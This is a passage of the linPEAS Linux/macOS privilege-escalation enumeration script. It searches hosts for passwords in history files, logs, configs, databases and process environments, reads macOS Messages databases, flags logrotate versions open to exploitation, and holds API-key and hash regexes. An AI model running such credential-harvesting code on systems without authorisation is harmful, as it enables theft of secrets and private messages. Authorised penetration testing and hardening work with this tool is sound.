12360 12361 fi 12362 12363 if check_mitre_filter "T1083"; then 12364 print_2title "Executable files potentially added by user (limit 70)" "T1083" 12365 if ! [ "$SEARCH_IN_FOLDER" ]; then 12366 find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems|/cgroup/" | sort -r | head -n 70 12367 else 12368 find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "/site-packages|/python|/node_modules|\.sample|/gems|/cgroup/" | sort -r | head -n 70 12369 fi 12370 echo "" 12371 12372 fi 12373 12374 if check_mitre_filter "T1204.002"; then 12375 if [ "$MACPEAS" ]; then 12376 print_2title "Unsigned Applications" "T1204.002" 12377 macosNotSigned /System/Applications 12378 fi 12379 12380 fi 12381 12382 if check_mitre_filter "T1083"; then 12383 if ! [ "$SEARCH_IN_FOLDER" ]; then 12384 if [ "$(ls /opt 2>/dev/null)" ]; then 12385 print_2title "Unexpected in /opt (usually empty)" "T1083" 12386 ls -la /opt 12387 echo "" 12388 fi 12389 fi 12390 12391 fi 12392 12393 if check_mitre_filter "T1083"; then 12394 if ! [ "$SEARCH_IN_FOLDER" ]; then 12395 print_2title "Unexpected in root" "T1083" 12396 if [ "$MACPEAS" ]; then 12397 (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found 12398 else 12399 (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found 12400 fi 12401 echo "" 12402 fi 12403 12404 fi 12405 12406 if check_mitre_filter "T1083"; then 12407 print_2title "Modified interesting files in the last 5mins (limit 100)" "T1083" 12408 find $ROOT_FOLDER -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," 12409 echo "" 12410 12411 fi 12412 12413 if check_mitre_filter "T1070.002"; then 12414 if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then #3.18.0 and below 12415 print_2title "Writable log files (logrotten) (limit 50)" "T1070.002" 12416 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#logrotate-exploitation" 12417 logrotate --version 2>/dev/null || echo_not_found "logrotate" 12418 lastWlogFolder="ImPOsSiBleeElastWlogFolder" 12419 logfind=$(find $ROOT_FOLDER -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 50) 12420 printf "%s\n" "$logfind" | while read log; do 12421 if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found 12422 if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; 12423 elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case 12424 elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; 12425 elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; 12426 fi 12427 fi 12428 done 12429 fi 12430 # Check syslog configuration 12431 print_2title "Syslog configuration (limit 50)" "T1070.002" 12432 if [ -f "/etc/rsyslog.conf" ]; then 12433 grep -v "^#" /etc/rsyslog.conf 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" | head -n 50 12434 elif [ -f "/etc/syslog.conf" ]; then 12435 grep -v "^#" /etc/syslog.conf 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" | head -n 50 12436 else 12437 echo_not_found "syslog configuration" 12438 fi 12439 # Check auditd configuration 12440 print_2title "Auditd configuration (limit 50)" "T1070.002" 12441 if [ -f "/etc/audit/auditd.conf" ]; then 12442 grep -v "^#" /etc/audit/auditd.conf 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" | head -n 50 12443 else 12444 echo_not_found "auditd configuration" 12445 fi 12446 # Check for log files with weak permissions 12447 print_2title "Log files with potentially weak perms (limit 50)" "T1070.002" 12448 find /var/log -type f -ls 2>/dev/null | grep -Ev "root\s+root|root\s+systemd-journal|root\s+syslog|root\s+utmp" | sed -${E} "s,.*,${SED_RED},g" | head -n 50 12449 echo "" 12450 12451 fi 12452 12453 if check_mitre_filter "T1083"; then 12454 if ! [ "$SEARCH_IN_FOLDER" ]; then 12455 print_2title "Files inside $HOME (limit 20)" "T1083" 12456 (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found 12457 echo "" 12458 fi 12459 12460 fi 12461 12462 if check_mitre_filter "T1552.001"; then 12463 if ! [ "$SEARCH_IN_FOLDER" ]; then 12464 print_2title "Files inside others home (limit 20)" "T1552.001" 12465 (find $HOMESEARCH -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found 12466 echo "" 12467 fi 12468 12469 fi 12470 12471 if check_mitre_filter "T1114.001"; then 12472 if ! [ "$SEARCH_IN_FOLDER" ]; then 12473 print_2title "Searching installed mail applications" "T1114.001" 12474 ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" | sort | uniq 12475 echo "" 12476 fi 12477 12478 fi 12479 12480 if check_mitre_filter "T1114.001"; then 12481 if ! [ "$SEARCH_IN_FOLDER" ]; then 12482 print_2title "Mails (limit 50)" "T1114.001" 12483 (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found 12484 echo "" 12485 fi 12486 12487 fi 12488 12489 if check_mitre_filter "T1552.001"; then 12490 if ! [ "$SEARCH_IN_FOLDER" ]; then 12491 if [ "$PSTORAGE_BACKUPS" ] || [ "$DEBUG" ]; then 12492 print_2title "Backup folders" "T1552.001" 12493 printf "%s\n" "$PSTORAGE_BACKUPS" | while read b ; do 12494 ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; 12495 ls -l "$b" 2>/dev/null && echo "" 12496 done 12497 echo "" 12498 fi 12499 fi 12500 12501 fi 12502 12503 if check_mitre_filter "T1552.001"; then 12504 print_2title "Backup files (limited 100)" "T1552.001" 12505 backs=$(find $ROOT_FOLDER -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) 12506 printf "%s\n" "$backs" | head -n 100 | while read b ; do 12507 if [ -r "$b" ]; then 12508 ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; 12509 fi; 12510 done 12511 echo "" 12512 12513 fi 12514 12515 if check_mitre_filter "T1005"; then 12516 if [ "$MACPEAS" ]; then 12517 print_2title "Reading messages database" "T1005" 12518 sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null 12519 sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null 12520 sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null 12521 fi 12522 if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then 12523 print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" "T1005" 12524 FILECMD="$(command -v file 2>/dev/null || echo -n '')" 12525 printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do 12526 if [ "$FILECMD" ]; then 12527 echo "Found "$(file "$f") | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; 12528 else 12529 echo "Found $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; 12530 fi 12531 done 12532 SQLITEPYTHON="" 12533 echo "" 12534 printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do 12535 if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd 12536 if [ "$(command -v sqlite3 2>/dev/null || echo -n '')" ]; then 12537 tables=$(sqlite3 $f ".tables" 2>/dev/null) 12538 #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" 12539 elif [ "$(command -v python 2>/dev/null || echo -n '')" ] || [ "$(command -v python3 2>/dev/null || echo -n '')" ]; then 12540 SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null || echo -n '') 12541 tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) 12542 #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" 12543 else 12544 tables="" 12545 fi 12546 if [ "$tables" ] || [ "$DEBUG" ]; then 12547 printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC 12548 printf "%s\n" "$tables" | while read t; do 12549 columns="" 12550 # Search for credentials inside the table using sqlite3 12551 if [ -z "$SQLITEPYTHON" ]; then 12552 columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") 12553 # Search for credentials inside the table using python 12554 else 12555 columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) 12556 fi 12557 #Check found columns for interesting fields 12558 INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") 12559 if [ "$INTCOLUMN" ]; then 12560 printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" 12561 printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" 12562 (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head 12563 echo "" 12564 fi 12565 done 12566 fi 12567 fi 12568 done 12569 fi 12570 echo "" 12571 if [ "$MACPEAS" ]; then 12572 print_2title "Downloaded Files" "T1005" 12573 sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" 12574 fi 12575 12576 fi 12577 12578 if check_mitre_filter "T1005"; then 12579 if [ "$MACPEAS" ]; then 12580 print_2title "Downloaded Files" "T1005" 12581 sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" 12582 fi 12583 12584 fi 12585 12586 if check_mitre_filter "T1005"; then 12587 if ! [ "$SEARCH_IN_FOLDER" ]; then 12588 print_2title "Web files?(output limit)" "T1005" 12589 ls -alhR /var/www/ 2>/dev/null | head 12590 ls -alhR /srv/www/htdocs/ 2>/dev/null | head 12591 ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head 12592 ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head 12593 echo "" 12594 fi 12595 12596 fi 12597 12598 if check_mitre_filter "T1564.001"; then 12599 print_2title "All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" "T1564.001" 12600 find $ROOT_FOLDER -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme|\.travis.yml" | head -n 70 12601 echo "" 12602 12603 fi 12604 12605 if check_mitre_filter "T1552.001"; then 12606 if ! [ "$SEARCH_IN_FOLDER" ]; then 12607 print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" "T1552.001" 12608 filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | grep -Ev "dpkg\.statoverride\.|dpkg\.status\.|apt\.extended_states\.|dpkg\.diversions\." | head -n 70) 12609 printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done 12610 echo "" 12611 fi 12612 12613 fi 12614 12615 if check_mitre_filter "T1552.001"; then 12616 if [ "$(history 2>/dev/null)" ] || [ "$DEBUG" ]; then 12617 print_2title "Searching passwords in history cmd" "T1552.001" 12618 history | grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED}," 12619 echo "" 12620 fi 12621 12622 fi 12623 12624 if check_mitre_filter "T1552.001"; then 12625 if [ "$PSTORAGE_HISTORY" ] || [ "$DEBUG" ]; then 12626 print_2title "Searching passwords in history files" "T1552.001" 12627 printf "%s\n" "$PSTORAGE_HISTORY" | while read f; do grep -EiH "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"; done 12628 echo "" 12629 fi 12630 12631 fi 12632 12633 if check_mitre_filter "T1552.001"; then 12634 if [ "$PSTORAGE_PHP_FILES" ] || [ "$DEBUG" ]; then 12635 print_2title "Searching passwords in config PHP files" "T1552.001" 12636 printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiIH "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done 12637 echo "" 12638 fi 12639 12640 fi 12641 12642 if check_mitre_filter "T1552.001"; then 12643 if [ "$PSTORAGE_PASSWORD_FILES" ] || [ "$DEBUG" ]; then 12644 print_2title "Searching *password* or *credential* files in home (limit 70)" "T1552.001" 12645 (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found 12646 echo "" 12647 fi 12648 12649 fi 12650 12651 if check_mitre_filter "T1552.001"; then 12652 if ! [ "$SEARCH_IN_FOLDER" ]; then 12653 print_2title "Checking for TTY (sudo/su) passwords in audit logs" "T1552.001" 12654 aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" 12655 find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" 12656 echo "" 12657 fi 12658 12659 fi 12660 12661 if check_mitre_filter "T1083"; then 12662 if ! [ "$SEARCH_IN_FOLDER" ]; then 12663 print_2title "Checking for TTY (sudo/su) passwords in audit logs" "T1083" 12664 aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" 12665 find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" 12666 echo "" 12667 fi 12668 12669 fi 12670 12671 if check_mitre_filter "T1114.001"; then 12672 if [ "$DEBUG" ] || ( ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$SEARCH_IN_FOLDER" ] ); then 12673 print_2title "Searching emails inside logs (limit 70)" "T1114.001" 12674 (find /var/log/ /var/logs/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" 12675 echo "" 12676 fi 12677 12678 fi 12679 12680 if check_mitre_filter "T1552.001"; then 12681 if ! [ "$SEARCH_IN_FOLDER" ]; then 12682 print_2title "Searching passwords inside logs (limit 70)" "T1552.001" 12683 (find /var/log/ /var/logs/ /private/var/log -type f -exec grep -R -H -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|modules-config/config-set-passwords\|config-set-passwords already ran\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," 12684 echo "" 12685 fi 12686 12687 fi 12688 12689 if check_mitre_filter "T1552.001"; then 12690 if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then 12691 ##-- IF) Find possible files with passwords 12692 print_2title "Searching possible password variables inside key folders (limit 140)" "T1552.001" 12693 if ! [ "$SEARCH_IN_FOLDER" ]; then 12694 timeout 150 find $HOMESEARCH -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & 12695 timeout 150 find /var/www $backup_folders_row /tmp /etc /mnt /private -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & 12696 else 12697 timeout 150 find $SEARCH_IN_FOLDER -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & 12698 fi 12699 wait 12700 echo "" 12701 ##-- IF) Find possible conf files with passwords 12702 print_2title "Searching possible password in config files (if k8s secrets are found you need to read the file)" "T1552.001" 12703 if ! [ "$SEARCH_IN_FOLDER" ]; then 12704 ppicf=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ /etc /opt /tmp /private /Applications /mnt -name "*.conf" -o -name "*.cnf" -o -name "*.config" -o -name "*.json" -o -name "*.yml" -o -name "*.yaml" 2>/dev/null) 12705 else 12706 ppicf=$(timeout 150 find $SEARCH_IN_FOLDER -name "*.conf" -o -name "*.cnf" -o -name "*.config" -o -name "*.json" -o -name "*.yml" -o -name "*.yaml" 2>/dev/null) 12707 fi 12708 printf "%s\n" "$ppicf" | while read f; do 12709 if grep -qEiI 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encryption\-provider\-config' "$f" 2>/dev/null; then 12710 echo "$ITALIC $f$NC" 12711 grep -HnEiIo 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encryption\-provider\-config' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" 12712 fi 12713 done 12714 echo "" 12715 fi 12716 12717 fi 12718 12719 if check_mitre_filter "T1552.007,T1082"; then 12720 if [ -z "$MACPEAS" ]; then 12721 print_2title "Checking all env variables in /proc/*/environ removing duplicates and filtering out useless env vars" "T1552.007,T1082" 12722 cat /proc/[0-9]*/environ 2>/dev/null | \ 12723 tr '\0' '\n' | \ 12724 grep -Eiv "$NoEnvVars" | \ 12725 sort -u | \ 12726 sed -${E} "s,$EnvVarsRed,${SED_RED},g" 12727 fi 12728 12729 fi 12730 12731 fi 12732 12733 fi 12734 echo '' 12735 echo '' 12736 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi 12737 12738 if echo $CHECKS | grep -q api_keys_regex; then 12739 if check_mitre_filter "T1552.001,T1528"; then 12740 print_title "API Keys Regex" 12741 if check_mitre_filter "T1552.001,T1528"; then 12742 if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then 12743 print_2title "Searching Hashed Passwords" 12744 search_for_regex "Apr1 MD5" "\\$apr1\\$[a-zA-Z0-9_/\\.]{8}\\$[a-zA-Z0-9_/\\.]{22}" 12745 search_for_regex "Apache SHA" "\\{SHA\\}[0-9a-zA-Z/_=]{10,}" 12746 search_for_regex "Blowfish" "\\$2[abxyz]?\\$[0-9]{2}\\$[a-zA-Z0-9_/\\.]*" 12747 search_for_regex "Drupal" "\\$S\\$[a-zA-Z0-9_/\\.]{52}" 12748 search_for_regex "Joomlavbulletin" "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" 12749 search_for_regex "Linux MD5" "\\$1\\$[a-zA-Z0-9_/\\.]{8}\\$[a-zA-Z0-9_/\\.]{22}" 12750 search_for_regex "phpbb3" "\\$H\\$[a-zA-Z0-9_/\\.]{31}" 12751 search_for_regex "sha512crypt" "\\$6\\$[a-zA-Z0-9_/\\.]{16}\\$[a-zA-Z0-9_/\\.]{86}" 12752 search_for_regex "Wordpress" "\\$P\\$[a-zA-Z0-9_/\\.]{31}" 12753 echo '' 12754 12755 print_2title "Searching Raw Hashes" 12756 search_for_regex "sha512" "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" 12757 echo '' 12758 12759 print_2title "Searching APIs" 12760 search_for_regex "Adobe Client Id (Oauth Web)" "(adobe[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32})['\"]" 1 12761 search_for_regex "Abode Client Secret" "(p8e-)[a-z0-9]{32}" 1 12762 search_for_regex "Age Secret Key" "AGE-SECRET-KEY-1[QPZRY9X8GF2TVDW0S3JN54KHCE6MUA7L]{58}" 12763 search_for_regex "Airtable API Key" "[\"']?air[-_]?table[-_]?api[-_]?key[\"']?[=:][\"']?.+[\"']\"" 12764 search_for_regex "Alchemi API Key" "(alchemi[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9-]{32})['\"]" 1 12765 search_for_regex "Alibaba Access Key ID" "(LTAI)[a-z0-9]{20}" 1 12766 search_for_regex "Alibaba Secret Key" "(alibaba[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{30})['\"]" 1 12767 search_for_regex "Artifactory API Key & Password" "[\"']AKC[a-zA-Z0-9]{10,}[\"']|[\"']AP[0-9ABCDEF][a-zA-Z0-9]{8,}[\"']" 12768 search_for_regex "Asana Client ID" "((asana[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9]{16})['\"])|((asana[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"])" 1 12769 search_for_regex "Atlassian API Key" "(atlassian[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{24})['\"]" 1 12770 search_for_regex "AWS Client ID" "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" 12771 search_for_regex "AWS MWS Key" "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" 12772 search_for_regex "AWS Secret Key" "aws(.{0,20})?['\"][0-9a-zA-Z\\/+]{40}['\"]" 12773 search_for_regex "AWS AppSync GraphQL Key" "da2-[a-z0-9]{26}" 12774 search_for_regex "Basic Auth Credentials" "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\\.[a-zA-Z]+" 12775 search_for_regex "Beamer Client Secret" "(beamer[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"](b_[a-z0-9=_\\-]{44})['\"]" 1 12776 search_for_regex "Binance API Key" "(binance[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{64})['\"]" 1 12777 search_for_regex "Bitbucket Client Id" "((bitbucket[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"])" 1 12778 search_for_regex "Bitbucket Client Secret" "((bitbucket[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-z0-9_\\-]{64})['\"])" 1 12779 search_for_regex "BitcoinAverage API Key" "(bitcoin.?average[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{43})['\"]" 1 12780 search_for_regex "Bitquery API Key" "(bitquery[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9]{32})['\"]" 1 12781 search_for_regex "Birise API Key" "(bitrise[a-z0-9_ \\.,\\-]{0,25})(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9_\\-]{86})['\"]" 1 12782 search_for_regex "Block API Key" "(block[a-z0-9_ 